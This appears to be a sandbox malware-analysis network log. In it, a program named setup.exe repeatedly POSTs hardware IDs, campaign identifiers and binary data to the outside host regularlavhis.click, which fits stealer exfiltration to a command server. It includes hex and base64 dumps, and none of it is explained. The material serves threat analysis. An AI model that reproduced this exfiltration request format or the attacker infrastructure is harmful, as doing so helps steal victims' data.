                                                                                                                        Data Ascii: rqQ5KiwnYBAIYTtEpbUxfSBHG78MqqmGa4GKt5soI83zjAxaSRc0ESEYB0SQlBA1ABIW5jQ+sepHqIJXgwA3/aa4YSoEFwg0JFEuca20FBw9RxoaUC+tAmuQun/OEGbpz4xtUy12KBQAbRNMkJwwaRQWOuYASpnGZ5iiS6MoC/GOoF16LBMBIRl5GxGV1QitIBYu4wTWqe5ftNtj6ih+0ba9cAMsJwwgDFEXcIiAHHEgKi7CJDq5xleMtnuXDAv
                                                                                                                        2025-01-06 14:40:24 UTC1369INData Raw: 41 4d 73 4f 2f 77 59 65 58 6c 36 53 50 47 30 46 45 77 39 52 78 72 36 4b 45 71 64 37 6b 4f 63 6d 6b 4f 4c 4b 43 2f 39 73 71 42 74 66 6a 51 6a 43 42 51 30 64 51 4e 67 76 50 77 45 55 52 51 53 4d 39 38 31 41 72 6d 33 5a 73 6d 43 2f 36 65 30 57 37 33 69 31 58 45 66 46 48 49 6f 50 42 46 34 5a 6e 43 59 69 43 78 42 48 41 59 6d 34 68 77 36 76 63 35 54 76 4c 35 4c 33 7a 41 6a 35 59 61 77 58 53 6f 73 49 7a 67 51 4d 46 6b 72 57 5a 57 4e 43 47 46 64 4a 33 76 65 32 44 61 5a 31 6d 76 78 67 68 36 76 64 52 76 4e 6d 34 30 51 59 68 77 76 4b 42 77 51 53 53 74 51 6b 49 51 77 59 53 67 43 4f 76 35 45 42 72 58 32 59 35 43 2b 5a 34 63 45 44 38 47 32 6e 47 6c 66 4c 53 34 6f 50 45 46 34 5a 6e 41 6f 4b 4e 31 31 75 4d 38 61 6f 7a 52 6e 70 63 70 57 71 65 4e 6a 70 78 77 72 38 5a 61 55
                                                                                                                        Data Ascii: AMsO/wYeXl6SPG0FEw9Rxr6KEqd7kOcmkOLKC/9sqBtfjQjCBQ0dQNgvPwEURQSM981Arm3ZsmC/6e0W73i1XEfFHIoPBF4ZnCYiCxBHAYm4hw6vc5TvL5L3zAj5YawXSosIzgQMFkrWZWNCGFdJ3ve2DaZ1mvxgh6vdRvNm40QYhwvKBwQSStQkIQwYSgCOv5EBrX2Y5C+Z4cED8G2nGlfLS4oPEF4ZnAoKN11uM8aozRnpcpWqeNjpxwr8ZaU
                                                                                                                        2025-01-06 14:40:24 UTC1369INData Raw: 5a 4a 49 41 68 56 46 33 79 45 6f 44 52 35 4f 44 35 53 77 69 68 4b 6e 65 4a 62 69 4b 4a 48 6b 77 41 50 35 62 4b 38 57 57 59 77 4c 78 41 42 49 55 41 48 62 50 57 31 61 58 32 34 5a 6e 61 57 56 44 59 68 34 6c 71 6f 2f 31 76 79 45 41 66 67 71 2b 31 78 52 6d 51 48 48 47 67 45 5a 54 39 4d 6d 50 77 4d 53 52 42 75 42 75 49 63 48 70 58 4f 57 37 43 47 64 37 38 67 42 38 57 47 73 45 42 6a 46 52 63 30 51 53 45 59 42 38 69 34 2b 46 52 78 42 41 70 43 73 77 78 2f 6e 62 4e 6e 74 4c 4e 69 39 68 41 58 2f 59 61 63 63 56 49 73 42 78 77 67 61 45 55 62 62 4c 43 59 51 46 55 67 4f 6a 62 2b 49 44 36 39 6e 6c 65 51 79 6e 66 66 57 52 72 6f 71 70 41 51 59 30 30 58 38 44 78 67 4f 51 70 34 55 4f 77 45 4a 52 41 53 4b 39 35 78 4f 73 44 57 65 35 6d 44 41 70 63 49 4a 2f 57 6d 73 48 56 47 48
                                                                                                                        Data Ascii: ZJIAhVF3yEoDR5OD5SwihKneJbiKJHkwAP5bK8WWYwLxABIUAHbPW1aX24ZnaWVDYh4lqo/1vyEAfgq+1xRmQHHGgEZT9MmPwMSRBuBuIcHpXOW7CGd78gB8WGsEBjFRc0QSEYB8i4+FRxBApCswx/nbNntLNi9hAX/YaccVIsBxwgaEUbbLCYQFUgOjb+ID69nleQynffWRroqpAQY00X8DxgOQp4UOwEJRASK95xOsDWe5mDApcIJ/WmsHVGH
                                                                                                                        2025-01-06 14:40:24 UTC1369INData Raw: 68 47 41 65 51 75 49 7a 41 63 56 45 6d 5a 2b 5a 70 41 72 6e 6e 5a 73 6d 43 62 34 73 63 48 2f 6d 4f 76 45 31 2b 50 46 38 41 50 47 68 39 41 31 79 67 68 41 68 4a 43 41 34 65 2b 6a 67 79 6b 63 70 37 6c 4a 64 69 72 68 41 48 73 4b 76 74 63 65 59 59 4f 78 6c 4e 53 58 6c 36 53 50 47 30 46 45 77 39 52 78 72 65 4a 42 61 4e 34 6d 75 55 6a 69 75 54 43 46 50 52 6e 71 51 35 53 67 41 44 48 42 51 55 64 52 39 6f 75 49 52 41 57 54 77 71 4e 39 38 31 41 72 6d 33 5a 73 6d 43 37 38 74 49 4d 38 32 61 31 46 31 6d 49 45 38 63 59 53 46 41 42 7a 53 49 38 51 6b 64 5a 47 5a 47 77 6e 45 36 77 4e 5a 37 6d 59 4d 43 6c 77 67 2f 79 62 61 55 53 53 6f 34 44 78 51 63 42 46 30 58 55 4a 69 30 47 47 30 67 4d 68 62 75 49 42 36 70 36 6e 65 4d 75 6b 65 71 45 53 4c 52 74 75 31 77 41 79 79 54 52 43
                                                                                                                        Data Ascii: hGAeQuIzAcVEmZ+ZpArnnZsmCb4scH/mOvE1+PF8APGh9A1yghAhJCA4e+jgykcp7lJdirhAHsKvtceYYOxlNSXl6SPG0FEw9RxreJBaN4muUjiuTCFPRnqQ5SgADHBQUdR9ouIRAWTwqN981Arm3ZsmC78tIM82a1F1mIE8cYSFABzSI8QkdZGZGwnE6wNZ7mYMClwg/ybaUSSo4DxQcBF0XUJi0GG0gMhbuIB6p6neMukeqESLRtu1wAyyTRC
                                                                                                                        2025-01-06 14:40:24 UTC1369INData Raw: 64 4e 79 34 4c 58 77 46 4a 67 61 2f 44 57 4f 6c 56 6b 76 77 6c 6e 2f 4f 47 4d 2f 64 6b 72 52 74 4f 79 78 72 31 52 6b 67 66 41 59 51 63 4e 45 49 4a 44 31 48 55 2b 63 4d 53 36 53 33 5a 72 53 4f 4b 39 38 49 46 34 6d 6e 6b 49 6d 61 73 45 38 41 50 47 42 6c 57 30 32 56 6a 51 68 41 50 55 62 2f 33 69 67 65 79 5a 49 2f 6e 4d 4a 2b 6c 2b 30 69 30 63 75 4e 45 47 4c 34 47 78 41 59 50 43 46 43 52 41 6a 73 49 47 46 38 4f 6b 62 6a 44 54 75 6c 7a 32 62 4a 7a 31 71 58 41 46 37 51 79 38 30 34 44 33 6c 61 64 57 46 6f 42 44 38 56 6c 4f 30 4a 48 48 55 66 47 70 63 4e 59 36 54 4b 61 2b 44 4b 65 35 74 49 46 73 31 53 64 4f 30 4b 47 41 39 30 5a 4e 69 42 47 78 69 67 72 46 51 34 44 48 49 57 35 6a 51 65 2f 4e 64 65 71 4c 39 69 39 2f 55 61 38 4b 70 78 53 47 4a 4e 46 6b 6b 67 39 48 55
                                                                                                                        Data Ascii: dNy4LXwFJga/DWOlVkvwln/OGM/dkrRtOyxr1RkgfAYQcNEIJD1HU+cMS6S3ZrSOK98IF4mnkImasE8APGBlW02VjQhAPUb/3igeyZI/nMJ+l+0i0cuNEGL4GxAYPCFCRAjsIGF8OkbjDTulz2bJz1qXAF7Qy804D3ladWFoBD8VlO0JHHUfGpcNY6TKa+DKe5tIFs1SdO0KGA90ZNiBGxigrFQ4DHIW5jQe/NdeqL9i9/Ua8KpxSGJNFkkg9HU
                                                                                                                        2025-01-06 14:40:24 UTC1369INData Raw: 47 31 39 5a 53 64 37 6c 7a 55 43 37 4e 63 47 71 5a 35 76 33 31 67 44 33 66 4b 42 62 5a 72 55 69 78 41 38 4a 43 46 48 4c 4b 68 4d 38 43 6b 77 48 69 4c 43 56 45 65 6b 37 32 65 56 67 77 4e 79 45 54 72 52 56 37 56 78 41 79 31 32 4b 50 51 73 51 54 39 73 7a 50 45 38 34 51 51 36 48 6f 5a 4d 58 70 6a 58 58 71 69 62 59 76 5a 5a 49 74 47 36 79 58 41 44 62 56 35 46 64 57 30 6b 52 6a 6a 70 6a 47 31 39 5a 53 64 37 6c 7a 55 43 37 4e 63 47 71 5a 35 76 33 31 67 44 33 66 4b 42 62 5a 72 55 69 78 41 38 4a 43 46 48 4c 4b 6d 49 73 4b 57 34 33 75 4b 4b 41 44 71 64 79 6a 2f 74 67 31 71 58 4c 52 71 78 54 34 31 51 59 74 45 75 4b 45 45 68 47 41 65 6b 6d 49 77 77 59 57 52 6a 4c 6b 49 30 48 71 47 4f 4a 2f 53 2f 58 79 2f 49 6e 74 43 54 6a 47 68 6a 54 56 34 52 49 44 41 38 42 68 48 56
                                                                                                                        Data Ascii: G19ZSd7lzUC7NcGqZ5v31gD3fKBbZrUixA8JCFHLKhM8CkwHiLCVEek72eVgwNyETrRV7VxAy12KPQsQT9szPE84QQ6HoZMXpjXXqibYvZZItG6yXADbV5FdW0kRjjpjG19ZSd7lzUC7NcGqZ5v31gD3fKBbZrUixA8JCFHLKmIsKW43uKKADqdyj/tg1qXLRqxT41QYtEuKEEhGAekmIwwYWRjLkI0HqGOJ/S/Xy/IntCTjGhjTV4RIDA8BhHV
                                                                                                                        2025-01-06 14:40:24 UTC1369INData Raw: 51 71 47 75 59 52 41 35 7a 57 42 71 6e 6a 59 79 4e 59 42 35 47 6e 6a 55 68 69 48 52 5a 4a 49 42 51 78 47 7a 43 5a 68 42 51 56 49 53 5a 6e 35 6d 6b 43 2f 4e 63 47 35 62 74 6a 33 68 46 36 30 4c 61 30 52 57 59 67 4c 79 52 6f 61 47 45 4c 4b 4a 6d 6f 38 49 57 49 62 67 61 65 41 51 70 68 34 6e 66 77 31 6d 2f 58 44 4f 4d 70 48 73 52 74 49 69 45 66 6d 44 77 55 53 66 2b 49 53 50 41 55 50 44 53 2b 46 6f 59 42 41 35 7a 57 42 71 6e 6a 59 79 4e 59 42 35 47 6e 68 4d 46 2b 47 43 59 6f 58 52 67 63 42 79 6d 56 31 55 56 45 50 47 38 62 76 77 30 65 71 5a 34 76 73 49 34 37 6d 67 7a 6a 4b 52 37 45 62 53 49 68 48 2b 77 55 4d 43 46 54 66 4e 53 6f 38 49 57 49 62 67 61 65 41 51 6f 78 50 32 39 73 32 6d 2b 58 4b 41 62 51 6b 34 77 51 59 30 30 58 6e 47 67 38 4f 51 70 34 41 46 30 41 75
                                                                                                                        Data Ascii: QqGuYRA5zWBqnjYyNYB5GnjUhiHRZJIBQxGzCZhBQVISZn5mkC/NcG5btj3hF60La0RWYgLyRoaGELKJmo8IWIbgaeAQph4nfw1m/XDOMpHsRtIiEfmDwUSf+ISPAUPDS+FoYBA5zWBqnjYyNYB5GnhMF+GCYoXRgcBymV1UVEPG8bvw0eqZ4vsI47mgzjKR7EbSIhH+wUMCFTfNSo8IWIbgaeAQoxP29s2m+XKAbQk4wQY00XnGg8OQp4AF0Au


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        2192.168.2.449751104.21.96.14437468C:\Users\user\Desktop\setup.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-06 14:40:24 UTC277OUTPOST /api HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: multipart/form-data; boundary=1NOJGNEGR5
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Content-Length: 18114
                                                                                                                        Host: regularlavhis.click
                                                                                                                        2025-01-06 14:40:24 UTC15331OUTData Raw: 2d 2d 31 4e 4f 4a 47 4e 45 47 52 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 34 45 30 33 36 45 36 46 33 31 46 32 37 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37 0d 0a 2d 2d 31 4e 4f 4a 47 4e 45 47 52 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 4e 4f 4a 47 4e 45 47 52 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 0d 0a 2d 2d 31 4e 4f 4a 47 4e 45 47 52 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                        Data Ascii: --1NOJGNEGR5Content-Disposition: form-data; name="hwid"C04E036E6F31F2708EEA336AD54C4C07--1NOJGNEGR5Content-Disposition: form-data; name="pid"2--1NOJGNEGR5Content-Disposition: form-data; name="lid"hRjzG3--ALFA--1NOJGNEGR5Content-D
                                                                                                                        2025-01-06 14:40:24 UTC2783OUTData Raw: 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9
                                                                                                                        Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_
                                                                                                                        2025-01-06 14:40:25 UTC1130INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 06 Jan 2025 14:40:25 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: PHPSESSID=n3dqff93st9c6qdj95q14csvmq; expires=Fri, 02 May 2025 08:27:04 GMT; Max-Age=9999999; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                        vary: accept-encoding
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DeL9kTW5RGtCnqNKQsaZcYJUiyZB8eJ%2Fyj28qmsj17yQBomHPr%2FoJchv%2FE2D4Nc4CKc1q4Lm3Ec80JIgKFJExbt2v553OsqifZ46pQVDXOEcIiDYsKlK85XiPotFeHm4aRGZqFmm"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8fdc768abadec32e-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2298&min_rtt=1752&rtt_var=1047&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2849&recv_bytes=19071&delivery_rate=1666666&cwnd=178&unsent_bytes=0&cid=07d254eddd440a56&ts=794&x=0"
                                                                                                                        2025-01-06 14:40:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                        2025-01-06 14:40:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        3192.168.2.449752104.21.96.14437468C:\Users\user\Desktop\setup.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-06 14:40:26 UTC279OUTPOST /api HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: multipart/form-data; boundary=MI2ER9LNNQ37X
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Content-Length: 8753
                                                                                                                        Host: regularlavhis.click
                                                                                                                        2025-01-06 14:40:26 UTC8753OUTData Raw: 2d 2d 4d 49 32 45 52 39 4c 4e 4e 51 33 37 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 34 45 30 33 36 45 36 46 33 31 46 32 37 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37 0d 0a 2d 2d 4d 49 32 45 52 39 4c 4e 4e 51 33 37 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 49 32 45 52 39 4c 4e 4e 51 33 37 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 0d 0a 2d 2d 4d 49 32 45 52 39 4c 4e 4e 51 33 37
                                                                                                                        Data Ascii: --MI2ER9LNNQ37XContent-Disposition: form-data; name="hwid"C04E036E6F31F2708EEA336AD54C4C07--MI2ER9LNNQ37XContent-Disposition: form-data; name="pid"2--MI2ER9LNNQ37XContent-Disposition: form-data; name="lid"hRjzG3--ALFA--MI2ER9LNNQ37
                                                                                                                        2025-01-06 14:40:26 UTC1133INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 06 Jan 2025 14:40:26 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: PHPSESSID=ib981kskg5s9qmrbcja6gdujka; expires=Fri, 02 May 2025 08:27:05 GMT; Max-Age=9999999; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                        vary: accept-encoding
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gurDcMTql48nQb%2FBg9t6VgMBDOGZvFAk0p2c8W5bnVQUK12vf2%2FbeoIKu%2F800%2F8PDQ7ly6qoiJDVH5PqutuwQP4Q6k0KKJFkyu0H0yHcNafjGMLgJFg%2BnZmsD4XoD4YNCb8%2BLExC"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8fdc76933dd5c32e-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1632&rtt_var=647&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2849&recv_bytes=9690&delivery_rate=1647855&cwnd=178&unsent_bytes=0&cid=6fcc030e8823641c&ts=654&x=0"
                                                                                                                        2025-01-06 14:40:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                        2025-01-06 14:40:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        4192.168.2.449753104.21.96.14437468C:\Users\user\Desktop\setup.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-06 14:40:27 UTC278OUTPOST /api HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: multipart/form-data; boundary=EKN0MGNIX3D
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Content-Length: 20394
                                                                                                                        Host: regularlavhis.click
                                                                                                                        2025-01-06 14:40:27 UTC15331OUTData Raw: 2d 2d 45 4b 4e 30 4d 47 4e 49 58 33 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 34 45 30 33 36 45 36 46 33 31 46 32 37 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37 0d 0a 2d 2d 45 4b 4e 30 4d 47 4e 49 58 33 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 45 4b 4e 30 4d 47 4e 49 58 33 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 0d 0a 2d 2d 45 4b 4e 30 4d 47 4e 49 58 33 44 0d 0a 43 6f 6e 74 65
                                                                                                                        Data Ascii: --EKN0MGNIX3DContent-Disposition: form-data; name="hwid"C04E036E6F31F2708EEA336AD54C4C07--EKN0MGNIX3DContent-Disposition: form-data; name="pid"3--EKN0MGNIX3DContent-Disposition: form-data; name="lid"hRjzG3--ALFA--EKN0MGNIX3DConte
                                                                                                                        2025-01-06 14:40:27 UTC5063OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1
                                                                                                                        Data Ascii: lrQMn 64F6(X&7~`aO@
                                                                                                                        2025-01-06 14:40:28 UTC1133INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 06 Jan 2025 14:40:28 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: PHPSESSID=pfdpo51khipnev8nggflar68m1; expires=Fri, 02 May 2025 08:27:06 GMT; Max-Age=9999999; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                        vary: accept-encoding
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2xuuJHhTZH9MGDBfh7TvplmwS0uHYpHGbTZE4mWVoAxWbPsUFK1J%2FPCKSX4G3JGECpq5plONrJatfq6bIap9L%2BP3J9KYn5dooQ1b%2FBLwi%2BDK8AdwdlZRgkjdz17MbZY%2FdgkZua8E"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8fdc769bcbd372a4-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1949&rtt_var=751&sent=18&recv=27&lost=0&retrans=0&sent_bytes=2849&recv_bytes=21352&delivery_rate=1437715&cwnd=212&unsent_bytes=0&cid=ecd10da85ae827ff&ts=713&x=0"
                                                                                                                        2025-01-06 14:40:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                        2025-01-06 14:40:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        5192.168.2.449754104.21.96.14437468C:\Users\user\Desktop\setup.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-06 14:40:28 UTC278OUTPOST /api HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: multipart/form-data; boundary=S5OQLYS040ZL
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Content-Length: 1212
                                                                                                                        Host: regularlavhis.click
                                                                                                                        2025-01-06 14:40:28 UTC1212OUTData Raw: 2d 2d 53 35 4f 51 4c 59 53 30 34 30 5a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 34 45 30 33 36 45 36 46 33 31 46 32 37 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37 0d 0a 2d 2d 53 35 4f 51 4c 59 53 30 34 30 5a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 35 4f 51 4c 59 53 30 34 30 5a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 0d 0a 2d 2d 53 35 4f 51 4c 59 53 30 34 30 5a 4c 0d 0a 43
                                                                                                                        Data Ascii: --S5OQLYS040ZLContent-Disposition: form-data; name="hwid"C04E036E6F31F2708EEA336AD54C4C07--S5OQLYS040ZLContent-Disposition: form-data; name="pid"1--S5OQLYS040ZLContent-Disposition: form-data; name="lid"hRjzG3--ALFA--S5OQLYS040ZLC
                                                                                                                        2025-01-06 14:40:29 UTC1124INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 06 Jan 2025 14:40:29 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: PHPSESSID=nnl2hu3snuovlf28aj01qk8o80; expires=Fri, 02 May 2025 08:27:08 GMT; Max-Age=9999999; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                        vary: accept-encoding
